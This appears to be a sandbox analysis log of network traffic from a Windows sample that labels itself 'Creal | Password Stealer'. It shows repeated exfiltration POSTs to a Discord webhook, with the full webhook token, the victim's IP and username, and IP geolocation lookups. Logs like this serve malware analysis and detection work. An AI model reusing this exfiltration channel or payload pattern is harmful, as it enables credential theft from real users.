                                                                                                                                                                                                                                                                                                2024-09-27 16:18:52 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:52 UTC1333INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:52 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=2f6b5cf47cec11efb5ce16ad33b060f2; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 3
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453933
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S3v%2Fgm%2FLVLFrHt9jdiQQvhGAvpqWdgmBYIsdriniRJOg3qteo5M0aZ9PdLhHvvSzcu4u2HyMGVdIZcef0oBWKdPanu7Ggc9tDbJeCFPHk3QtckzkduAWwJezubJ0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=2f6b5cf47cec11efb5ce16ad33b060f2963a185fec13ac46aeceda20083a51363540c29048eb5cd51caff213e9f6819f; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=6a9f61f54c68ada5aae4c2e5f45fd9d07ebfdfbb-1727453932; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:52 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 45 35 58 57 75 43 75 34 69 50 4e 2e 4d 7a 34 4f 54 73 47 56 43 55 78 30 4a 6e 51 43 68 57 52 38 6f 48 47 75 44 6e 5a 6b 6b 4f 30 2d 31 37 32 37 34 35 33 39 33 32 31 36 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 65 33 39 62 64 61 34 32 64 35 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=E5XWuCu4iPN.Mz4OTsGVCUx0JnQChWR8oHGuDnZkkO0-1727453932160-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfe39bda42d5-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:52 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                17192.168.2.849728162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:52 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:52 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:52 UTC1337INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:52 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=2fd62f207cec11ef9478bec7e893c0ff; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 3
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453934
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bu7Yqqwp7%2Bs2PSW5ZKNTIvzzPQP%2BbyqMy4bhi5pb2BOcSVoEp6DesiB6lZ6NZNEQxvrh8Hvg2zSlCzYV4ZF%2F07nQOi7tVyB4axRe8c%2F0vkP5YF26vHfk4o2hksl4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=2fd62f207cec11ef9478bec7e893c0ff677f20117665331703391b771d5fb5f5649ddefc0a99d4b96ef86586658d0d02; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=6a9f61f54c68ada5aae4c2e5f45fd9d07ebfdfbb-1727453932; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:52 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 2e 64 4e 44 71 2e 77 75 64 2e 72 48 2e 62 6c 6e 55 58 45 43 2e 74 70 69 6a 69 68 43 64 76 36 53 79 54 47 30 6b 6c 31 35 57 49 30 2d 31 37 32 37 34 35 33 39 33 32 38 36 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 65 37 66 63 31 30 37 32 39 30 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=.dNDq.wud.rH.blnUXEC.tpijihCdv6SyTG0kl15WI0-1727453932860-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfe7fc107290-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:52 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                18192.168.2.849729162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:53 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:53 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:53 UTC1333INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:53 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=303ad38a7cec11ef894692cc3f667719; Expires=Wed, 26-Sep-2029 16:18:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453934
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QShPN%2FNf9IrmsETLd0ehwwIZZwBvBfju7kwZ89KsrZNl1IcCMbbO9m2EJ%2BZ5GdeB2D3Rs1LNXKoqZLvuWge4U7UntwlhP3pg44V561WKk830wsLkLJyQHOetI8EH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=303ad38a7cec11ef894692cc3f667719703d78845b9d2992d263c75fbc29682aa9f61d3feb155da2059d4a5c293e7801; Expires=Wed, 26-Sep-2029 16:18:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=8d94676341efb39bad306ebb92a7fe1d375736b4-1727453933; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:53 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 45 6c 63 49 4d 52 52 54 4f 61 45 4f 51 75 72 56 35 6a 61 77 6f 5f 78 57 65 34 2e 2e 52 57 2e 70 58 33 6d 4c 64 79 79 59 54 69 41 2d 31 37 32 37 34 35 33 39 33 33 35 32 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 65 63 32 63 66 32 34 32 31 31 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=ElcIMRRTOaEOQurV5jawo_xWe4..RW.pX3mLdyyYTiA-1727453933523-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfec2cf24211-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:53 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                19192.168.2.849730162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:54 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:54 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:54 UTC1337INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:54 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=30a3d9207cec11ef96902e88ff694586; Expires=Wed, 26-Sep-2029 16:18:54 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453935
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z3uW8mhJQe3h6mjBPduwb7BN%2Bz7PDOoy0%2FruhAfZcAjpA8YDgxhTfgHXlMFvLkQm4gngaZlaprYk0m9N7F3ERT0c7KVLFJSjSGQ0WdUxpNdnXGOW7xjj2TjWbJ%2F%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=30a3d9207cec11ef96902e88ff694586d92bddde534c181d0b626fe8b7577f54e6bd291a31ce00edc8bf56a23921a6ef; Expires=Wed, 26-Sep-2029 16:18:54 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=7ad43c1cb07092dd708b3c6e0f1bdcacbed004e5-1727453934; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:54 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 73 75 77 58 71 57 56 62 64 36 44 49 43 75 4e 37 53 4a 61 70 6c 75 75 42 64 75 53 61 76 72 68 4c 36 48 6d 63 53 79 35 6c 6a 66 41 2d 31 37 32 37 34 35 33 39 33 34 32 30 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 66 30 35 62 35 37 34 33 62 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=suwXqWVbd6DICuN7SJapluuBduSavrhL6HmcSy5ljfA-1727453934206-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccff05b5743bc-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:54 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                20192.168.2.849732172.67.74.1524434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:55 UTC117OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:55 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:55 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8c9ccffacc938cdd-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:55 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                21192.168.2.849733159.89.102.2534434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:56 UTC139OUTGET /jsonp/8.46.123.33 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: geolocation-db.com
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:56 UTC206INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:56 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:56 UTC171INData Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                22192.168.2.849734162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
